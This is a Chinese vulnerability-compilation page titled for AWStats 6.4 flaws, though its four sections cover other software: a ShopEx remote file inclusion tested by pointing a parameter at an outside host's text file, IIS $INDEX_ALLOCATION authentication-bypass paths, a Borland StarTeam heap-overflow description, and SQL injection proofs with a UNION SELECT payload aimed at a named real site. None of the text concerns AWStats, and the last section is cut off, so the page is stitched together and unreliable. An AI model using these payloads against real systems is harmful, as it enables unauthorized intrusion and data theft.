AWStats 6.4及以下版本多个漏洞以及分析

2024-05-04

AWStats 6.4及以下版本多个漏洞以及分析(精选4篇)

篇1:AWStats 6.4及以下版本多个漏洞以及分析

ShopEx4.7及以下版本远程包含漏洞

漏洞描述:

verifycode.php

/**

*

* 登陆验证码生成文件

*

* @package ShopEx网上商店系统

* @version 4.6

* @author ShopEx.cn

* @url

* @since PHP 4.3

* @copyright ShopEx.cn

*

**/ if (!defined(”ISSHOP“))

{ Header(”Location:../index.php“);

exit;

}

/* 调用 session 文件 */ include_once($INC_SYSHOMEDIR.”include/session.inc.php“);mt_srand((double)microtime * 1000000);

/* 生成验证码 */

$strValidate = mt_rand(1000, 9999);

session_unregister(”RANDOM_CODE“);

session_register(”RANDOM_CODE“);

$_SESSION[”RANDOM_CODE“] = $strValidate.”“;

$verifyImg = newclass(”verifyCode“, $strValidate);

/* 输出验证码图片 */

$verifyImg->Output();

?>

测试方法:

www.hackqing.cn/shop/verifycode.php?INC_SYSHOMEDIR=www.hackqing.com/xx.txt?

防治建议:

暂无

请参考官方补丁

ShopEx.cn

篇2:AWStats 6.4及以下版本多个漏洞以及分析

微软IIS与PHP 6.0(这是对PHP5中的Windows Server SP1的测试)详细说明:

攻击者可以发送一个特殊的请求发送到IIS 6.0服务,成功绕过访问限制

攻击者可以访问有密码保护的文件

例:–>

Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php

1 Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php

(暂时没有翻译,怕影响精确度)

if the:$INDEX_ALLOCATION postfix is appended to directory name.

This can result in accessing administrative files and under special circumstances execute arbirary code remotely

微软IIS 7.5经典的ASP验证绕过

受影响的软件:.NET Framework 4.0(.NET框架2.0是不受影响,其他.NET框架尚未进行测试)(在Windows 7测试)

详细说明:

通过添加 [ “:$i30:$INDEX_ALLOCATION” ] to the directory serving (便可成功绕过)

例:

There is a password protected directory configured that has administrative asp scripts inside An attacker requests the directory with :$i30:$INDEX_ALLOCATION appended to the directory name IIS/7.5 gracefully executes the ASP script. without asking for proper credentials

IIS 7.5 NET源代码泄露和身份验证漏洞

(.NET 2.0和.NET 4.0中测试)

例:–>

/admin:$i30:$INDEX_ALLOCATION/admin.php

1 /admin:$i30:$INDEX_ALLOCATION/admin.php

will run the PHP script. without asking for proper credentials.(暂时没有翻译)

By appending /.php to an ASPX file (or any other file using the .NET framework that is not blocked through the request filtering rules,like misconfigured: .CS,.VB files) IIS/7.5 responds with the full source code of the file and executes it as PHP code. This means that by using an upload feature it might be possible (under special circumstances) to execute arbitrary PHP code. Example: Default.aspx/.php

篇3:AWStats 6.4及以下版本多个漏洞以及分析

受影响系统:

Borland StarTeam server 2008 <= 10.0.0.57

Borland StarTeam MPX <= 6.7 描述:

Borland Starteam是Borland公司ALM生命周期管理的核心工具,是目前市面上最好的软件配置管理工具之一。 Starteam服务器没有正确地计算为从客户端所接收到的某些数组所需分配的内存数,导致多个整数溢出漏洞。在PROJECT_LOGIN和SET_SERVER_ACL命令中,有32位从客户端所接收到的用于指定报文中条目数量的数字分别被乘以8(或4,具体取决于文件名名称或规范)和12,然后未经考虑32位的限制便将结果用于分配内存,这可能触发堆溢出,允许攻击者控制某些寄存器,导致执行恶意指令。但攻击者必须拥有有效帐号才能利用这些漏洞。 StarTeam MPX也存在多个溢出和拒绝服务漏洞: ------------------------------------------------------------

A] 剩余数据计算整数溢出

------------------------------------------------------------ STMessageBroker67和STMulticastService67进程所使用的TmsgBufMsgDeserializeEx函数用于对入站数据执行还原序列化操作,

协议由报文中顺序排列的三类数据组成:列表,数组(16字节固定大小)和剩余数据。在计算剩余数据大小时存在整数溢出,如果使用了少于报文中所指定的数组数量的话,就可以触发这个溢出。但成功利用这个漏洞只能导致服务崩溃,因为无法利用任意数据覆盖服务器的内存。 ---------------------------------------------

B] 列表处理堆溢出

--------------------------------------------- 列表中包含的初始32位值指定报文中列表组所占的字节数,其中每个列表为16位大小值,之后为其中所声明数量的数据。由于服务器没有检查目标缓冲区的大小,允许攻击者利用之后的堆溢出导致服务崩溃或执行任意指令。 ---------------------------------------------------

C] 无法分配内存导致进程终止

--------------------------------------------------- 用于计算所要分配的以下数据数量时: 报文大小

列表大小

数组数 * 16

头大小 如果无法分配上述大小数量内存的话,就会导致服务器终止。 厂商补丁:

篇4:AWStats 6.4及以下版本多个漏洞以及分析

简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

结果明显不同 注入漏洞产生

修复方案:过滤变量app

第二个

简要描述:过滤不严导致存在SQL注入

详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version,4,5,user(),database(),8,9--

labs.duba.net/robots.txt

未作进一步测试

修复方案:过滤参数

第三个:

简要描述:留言处过滤不严 造成跨站漏洞

详细说明:留言处过滤不严 造成跨站漏洞

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

留言处输入:

上一篇:文广新局年度公共文化事业工作总结下一篇:2022年我国中药材产业价格走势分析